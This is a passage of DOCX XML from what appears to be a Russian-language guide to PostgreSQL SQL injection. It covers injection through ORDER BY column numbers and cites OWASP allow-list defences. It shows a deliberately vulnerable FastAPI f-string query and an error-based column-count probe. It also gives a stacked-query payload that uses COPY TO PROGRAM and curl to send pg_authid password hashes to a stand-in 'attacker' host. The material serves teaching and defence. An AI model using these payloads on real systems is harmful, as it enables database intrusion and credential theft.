          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Все версии PG</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">; bind-protocol для identifier не работает с 7.4 (когда extended protocol появился). Никакие фиксы не закрывают этот класс — это application-level mis-configuration + протокольное ограничение.</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Variant A зависит от driver-mode; см. таблицу 3.5.6.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канал извлечения для Variant B при выровненном select-list count.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via CAST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Variant B также может попасть в error-канал через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ERROR: ORDER BY position N is not in select list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3.14.3 ORDER BY column_number</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — integer-column-reference, тот же ORDER BY-clause, но другой контекст.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тот же класс уязвимостей на серверной стороне (внутри plpgsql functions).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whitelist-шаблоны для ORDER BY.</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«SELECT» / «ORDER BY Clause» — https://www.postgresql.org/docs/current/sql-select.html#SQL-ORDERBY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«System Information Functions»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https://www.postgresql.org/docs/current/functions-info.html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OWASP: «SQL Injection Prevention Cheat Sheet» (раздел Defense Option 3: Allow-list Input Validation) — https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html#defense-option-3-allow-list-input-validation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Unicode TR #36 «Unicode Security Considerations» (homoglyph attacks) — https://www.unicode.org/reports/tr36/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SQLAlchemy Docs: «Using SQL Functions and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">quoted_name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">» — https://docs.sqlalchemy.org/en/20/core/sqlelement.html#sqlalchemy.sql.elements.quoted_name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Wire Protocol: «Message Formats» (Bind / Parse) — https://www.postgresql.org/docs/current/protocol-message-formats.html</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.14.3 ORDER BY column_number (integer в select-list reference)</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Альтернативный синтаксис sort-by-column в PostgreSQL — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ORDER BY N</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, где N — номер колонки из select-list (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ORDER BY 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> сортирует по первой колонке). Это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">integer-context</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, но не интерпретируемое значение — это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">позиционная ссылка на select-list</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Кажется безопаснее, чем </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ORDER BY name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (число — это число), и некоторые SQL-builder-ы используют </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ORDER BY {n}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> как «защищённый» вариант. На деле — два класса проблем: (1) integer-context всё равно позволяет stacked queries в simple-protocol через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">1; ...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">; (2) error-канал через невалидный column number — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ORDER BY 99</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> возвращает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ERROR: ORDER BY position 99 is not in select list</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> с числом, что позволяет атакующему вычислить точное количество колонок в select-list — критичный шаг для UNION-extraction (3.1).</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app/api/v1/admin_logs.py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Query,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@router.get("/admin/audit-logs")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">async def list_audit_logs(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    sort_col: str = Query("1"),   # ← string, не int</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    direction: str = Query("DESC"),</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if direction not in ("ASC", "DESC"):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        direction = "DESC"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ORDER BY column_number через f-string</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user_id, action, target, occurred_at</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        FROM audit_log</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        WHERE occurred_at &gt; now() - interval '30 days'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        ORDER BY {sort_col} {direction}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        LIMIT 100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Разработчик заменил «опасный» </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ORDER BY column_name</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ORDER BY column_number</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, считая что число защищает от injection. Но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">sort_col</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string</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, не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и f-string подставляет его как текст.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload — три варианта</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Вариант A — error-based для определения select-list count (любой драйвер):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">GET /admin/audit-logs?sort_col=99&amp;direction=ASC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">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user_id, action, target, occurred_at FROM audit_log</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE occurred_at &gt; now() - interval '30 days'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ORDER BY 99 ASC LIMIT 100</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Сервер отвечает:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ERROR: ORDER BY position 99 is not in select list</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">LINE 4: ORDER BY 99 ASC LIMIT 100</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HTTP-500 с error message в body. Атакующий </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">итерирует</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> N от 1 вверх: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">?sort_col=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (200 OK), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">?sort_col=2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (200 OK), ..., </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">?sort_col=5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (200 OK), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">?sort_col=6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (500 ERROR) → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">select-list имеет ровно 5 колонок</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Эта информация — основа для UNION-injection через любой другой endpoint того же приложения, который использует тот же select-list (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT id, user_id, action, target, occurred_at FROM audit_log</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Вариант B — stacked queries (simple-protocol):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">GET /admin/audit-logs?sort_col=1;%20COPY%20(SELECT%20rolname,rolpassword%20FROM%20pg_authid)%20TO%20PROGRAM%20'curl%20http://attacker/?d=$(cat%20-)'--</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">sort_col = "1; COPY (SELECT rolname,rolpassword FROM pg_authid) TO PROGRAM 'curl ...'--"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w: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(simple-mode):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT ... ORDER BY 1; COPY (SELECT rolname,rolpassword FROM pg_authid)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">TO PROGRAM 'curl http://attacker/?d=$(cat -)'-- DESC LIMIT 100</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
